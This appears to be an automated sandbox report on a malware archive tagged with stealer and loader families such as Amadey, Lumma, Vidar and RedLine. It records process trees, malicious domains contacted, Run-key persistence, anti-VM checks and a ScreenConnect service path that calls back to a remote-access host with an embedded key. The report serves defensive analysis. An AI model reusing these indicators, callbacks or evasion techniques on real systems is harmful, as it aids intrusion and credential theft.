Malware Analysis Report

2025-04-03 09:12

Sample ID 250226-3r6zssyks3
Target quarantine.7z
SHA256 1824be1799f0c32c14c5fcb3c5d34c98b9fb4d2b867067b8ddc3d129783812fe
Tags discovery spyware stealer amadey lumma systembc vidar 092155 a4d2cd ir7am credential_access defense_evasion execution persistence privilege_escalation trojan redline testproliv infostealer healer dropper evasion gcleaner loader stealc reno
Score 10/10

Analysis Overview

score
10/10

SHA256

1824be1799f0c32c14c5fcb3c5d34c98b9fb4d2b867067b8ddc3d129783812fe

Threat Level: Known bad

The file quarantine.7z was found to be: Known bad.

Malicious Activity Summary

discovery spyware stealer amadey lumma systembc vidar 092155 a4d2cd ir7am credential_access defense_evasion execution persistence privilege_escalation trojan redline testproliv infostealer healer dropper evasion gcleaner loader stealc reno

Amadey family

Vidar family

Lumma Stealer, LummaC

Vidar

Healer

RedLine payload

Healer family

GCleaner

Modifies Windows Defender DisableAntiSpyware settings

Detect Vidar Stealer

Modifies Windows Defender notification settings

Systembc family

Lumma family

Redline family

Stealc family

Modifies Windows Defender Real-time Protection settings

Amadey

RedLine

Gcleaner family

Modifies Windows Defender TamperProtection settings

SystemBC

Detects Healer an antivirus disabler dropper

Stealc

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Blocklisted process makes network request

Uses browser remote debugging

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Sets service image path in registry

Reads user/profile data of web browsers

Checks computer location settings

Unsecured Credentials: Credentials In Files

Reads data files stored by FTP clients

Checks BIOS information in registry

Event Triggered Execution: Component Object Model Hijacking

Windows security modification

Loads dropped DLL

Identifies Wine through registry keys

Executes dropped EXE

Reads user/profile data of local email clients

Checks installed software on the system

Enumerates connected drives

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Drops file in System32 directory

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Boot or Logon Autostart Execution: Authentication Package

AutoIT Executable

Drops file in Program Files directory

Drops file in Windows directory

Program crash

Browser Information Discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Unsigned PE

Delays execution with timeout.exe

Scheduled Task/Job: Scheduled Task

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of FindShellTrayWindow

Enumerates system info in registry

Modifies Internet Explorer settings

Suspicious use of AdjustPrivilegeToken

Checks processor information in registry

Suspicious use of SendNotifyMessage

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Checks SCSI registry key(s)

Suspicious use of SetWindowsHookEx

Kills process with taskkill

Modifies system certificate store

Modifies registry class

Uses Volume Shadow Copy service COM API

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2025-02-26 23:45

Signatures

AutoIT Executable

Unsigned PE

Analysis: behavioral4

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win10v2004-20250217-en

Max time kernel

127s

Max time network

139s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe"

Signatures

Reads user/profile data of local email clients

spyware stealer

Checks installed software on the system

discovery

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4056 set thread context of 2128 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4056 -ip 4056

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4056 -s 788

Network

Country Destination Domain Proto
US 8.8.8.8:53 privileggoe.live udp
US 8.8.8.8:53 foresctwhispers.top udp
US 104.21.48.1:443 foresctwhispers.top tcp
US 8.8.8.8:53 tracnquilforest.life udp
US 104.21.74.230:443 tracnquilforest.life tcp
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
US 8.8.8.8:53 presentymusse.world udp
US 8.8.8.8:53 deaddereaste.today udp
US 8.8.8.8:53 subawhipnator.life udp
US 8.8.8.8:53 boltetuurked.digital udp
US 8.8.8.8:53 pastedeputten.life udp
US 8.8.8.8:53 steamcommunity.com udp
FR 2.18.131.137:443 steamcommunity.com tcp
US 8.8.8.8:53 disobilittyhell.live udp
US 172.67.137.158:443 disobilittyhell.live tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp

Files

memory/4056-0-0x0000000074D0E000-0x0000000074D0F000-memory.dmp

memory/4056-1-0x00000000006F0000-0x0000000000758000-memory.dmp

memory/4056-2-0x0000000005630000-0x0000000005BD4000-memory.dmp

memory/2128-6-0x0000000000400000-0x000000000045E000-memory.dmp

memory/2128-4-0x0000000000400000-0x000000000045E000-memory.dmp

memory/4056-7-0x0000000074D00000-0x00000000754B0000-memory.dmp

memory/2128-8-0x0000000000400000-0x000000000045E000-memory.dmp

memory/2128-9-0x0000000000400000-0x000000000045E000-memory.dmp

Analysis: behavioral10

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win10v2004-20250217-en

Max time kernel

145s

Max time network

139s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\I8L5Xon.html

Signatures

Browser Information Discovery

discovery

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 404 wrote to memory of 3416 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2992 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 4132 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2160 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\I8L5Xon.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe558d46f8,0x7ffe558d4708,0x7ffe558d4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,3913451632578492030,17860219987844110835,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2204 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,3913451632578492030,17860219987844110835,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2164,3913451632578492030,17860219987844110835,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2760 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,3913451632578492030,17860219987844110835,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,3913451632578492030,17860219987844110835,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,3913451632578492030,17860219987844110835,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5124 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,3913451632578492030,17860219987844110835,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5124 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,3913451632578492030,17860219987844110835,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4128 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,3913451632578492030,17860219987844110835,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5116 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,3913451632578492030,17860219987844110835,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,3913451632578492030,17860219987844110835,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,3913451632578492030,17860219987844110835,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3172 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

\??\pipe\LOCAL\crashpad_404_UZJMFXSTJWXGJZQO

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Analysis: behavioral13

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win7-20240903-en

Max time kernel

149s

Max time network

151s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\quarantine\am_no.bat"

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Vidar Stealer

stealer

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

SystemBC

trojan systembc

Systembc family

systembc

Vidar

stealer vidar

Vidar family

vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\ScreenConnect Client (3be09d9e5e840c20)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (3be09d9e5e840c20)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=bbcnas2.zapto.org&p=8041&s=6b3c9f2e-719d-4888-b6ab-03b40b2eb090&k=BgIAAACkAABSU0ExAAgAAAEAAQBdpn0O4B1VqMLUD0QDsNyYTlq4tRTm9ACUnnSMesFZALDh%2bLgBUwyTJ9D684SXejMRZmxv0Ws0vI2HDF%2f3pgx%2bIGwSyAZ%2fcl0w71rKbKyIIKYDZKbnkGgXvWGAi3ZyQp5OOPPQACb3KOn3dbHGC7zVR4YxQG18q4ph%2fyqoczab4g1p0ctN9m9IinVuQ4spX2nQNInOfCqxjvWdinItao7pk9fPOEV6qP3zSVfOwlnLHbRaASXeN%2fudvdB8e5o68h%2bjKG6VwXtszNJDCo7VtQqZmoYLmAVq9dmcJjckjVt0p%2bJPysj6usBrEV3AzT%2ff7W%2bYHYQ0svZBekSGOWFY8kLf&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAU5OaUtE1TkuAPjiKumW%2bygAAAAACAAAAAAAQZgAAAAEAACAAAAAw8RLkaTVVS0QGmN%2fM62zkgh9ftEh44PE3JHHXJtDipQAAAAAOgAAAAAIAACAAAACPBk%2bV%2fR9PfcVr1ydNe6gmddRXwrPIU63zMEqNkV9OEaAEAADkYLVoGIM9DRzerSW1TZY%2fgfpc3yStncNb33ZhAkVqx9hVIoelHdIVD2TFgDbSdBFfP7S1W%2fzDzL3rwGjKBzLDmyRlsn41P%2f6bSTbhir7oo38FDgwESeKnMLLzQuRVg8UePm1sIQRXfA1bipCyvR6N04xh8qZ9w6EVzdzWbLFzjRRXpgT6%2fqpL4vF43WRtAjYqO%2baQDl24hLl5YGkBYFge%2fDZqninCMzoXPz4AfN7UoPI%2bXuLoiRy5rmcIQgnZ%2fgPKj6IFaOEhhaKCOSsStmQQce%2bCCCjR6PTjpxsYXKgvy71VkyM7YLPoRyQ9b11LOvmGEM2LtIo8uTBWcOS%2bF%2bPMFAueAd%2f2Deb56tBV0kpb7zPze1gmtXFLmdCrjC1g6IRzBzXEHm4l5wlVDZobdu9am3sYzGIJnKhcW6VaP97C%2bryQe1nAVv6sv2ce7ObKssir8pk4Rq4gq095H%2bWddEXU1LV5WEAntcWwPB0MMJ74hCEc9Fg6hz7ajU7GIpVVL592XOZ%2fAu4NLctY9hwN5nQ3ScGwuQ84argdU%2bRtndXpMMDao%2fnd2gcl%2fUC7tUDbKQ0H1yHdNDg8tOyUixEuVJo4Jn8LGez7YcoHOG2FDEfNN26KeA8skipszJfMrUt0pAST4YQ2CcHuhsdRC1cNvwf8XFLY8OiKrQRimzoKTF1pDWAkasqfci38vKWqTegNq6Nj0RdX6gVgXNuyi85bo%2fbQ%2b0Y%2fVdgVmggfEycegt2GK%2fjT4MpCXlBn5%2bja89OoAdm%2bID196i%2b%2b1AdDJVkPZEqbmAYXrkaZEVHZYvXWod4ztdu1YGg6qdR3a4SV%2bB5aIUL0y3HcKqczWtdwtvpb53boFrGlQU47Utrsem0XZBGTGNw2xhbISH5fESXSMCdK6FLMKI8Omr9I%2fv6InZuQVSS4kJnhC2TkTV%2b9ZserhBFcMoFzhMMooMmabslTLftw3rd82uuv8scOf9Xp%2b8ah7LD9dcWMSb9iKN88ZpnUAnSHjVDBMLxfcdel5%2fHYmACo5JTKaWFN%2fq
mFGNzQyyKvzLHw6a%2byWANedvG2XXQpUnSe6HBgPa%2bxVrKjikrxIba2LMyzDGrw660KKKwl0AF7mzUhbwByYjaJfZweXtnEWizmfNmNSvRxT42HhvJ517imA%2beK2IrxcupOQ2uuiJPG1UzqsobBQTVBMMD0PW2xXdTmwbLdRqPqGqBEnoBwu7MR2QG0BwuHyirumqilhZ3bXovitTDSjP2LwI5p1rhqpngYyEkt%2bqddkYG%2fOzgkYmVkJkEYwlQ4b4mo9qZ77tcVXCATjDr8jGdRR%2bvcKfvzd1ZZJSmbf4CiNlTGzPBYeZVgigk%2bvqa7r7YJHMWK8bXp34cPiaiZ%2fuPObdiPXOK3dChMWLvle%2fp8r0aj4DBPuRENHJAHCcs5%2fwJitYQS7UGvyJJsCCQFWE6ZPYu13bUHI0faYuRmSEYHnDGtmIOzGiTAu4PyOPCXlvB0wtEVIUPYsl1N3EubzyeBKlF5PznZolmm5iWq2tDANPrloBvThdLTDp6AmePl0wDEsSHLm4X2fBBNYDHJX831tYqENrkK9aQCbkAAAABbkiKYWXUMRxwRufr7i9O0T32%2bpBGj8gSywdehmhuJurcDKFNYT8P5bmAUhN2Y3BjUbD01Qu2%2fbKEuvoJFPfhi&c=test&c=&c=&c=&c=&c=&c=&c=\"" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10003000101\57028ffad4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10030770101\xqWgymz.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine N/A N/A
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10003000101\57028ffad4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\cb4d3138f3.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10036500101\\cb4d3138f3.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\7fc0d1d799.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10035810101\\7fc0d1d799.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10035820121\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\0d88a612ec.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10036490101\\0d88a612ec.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
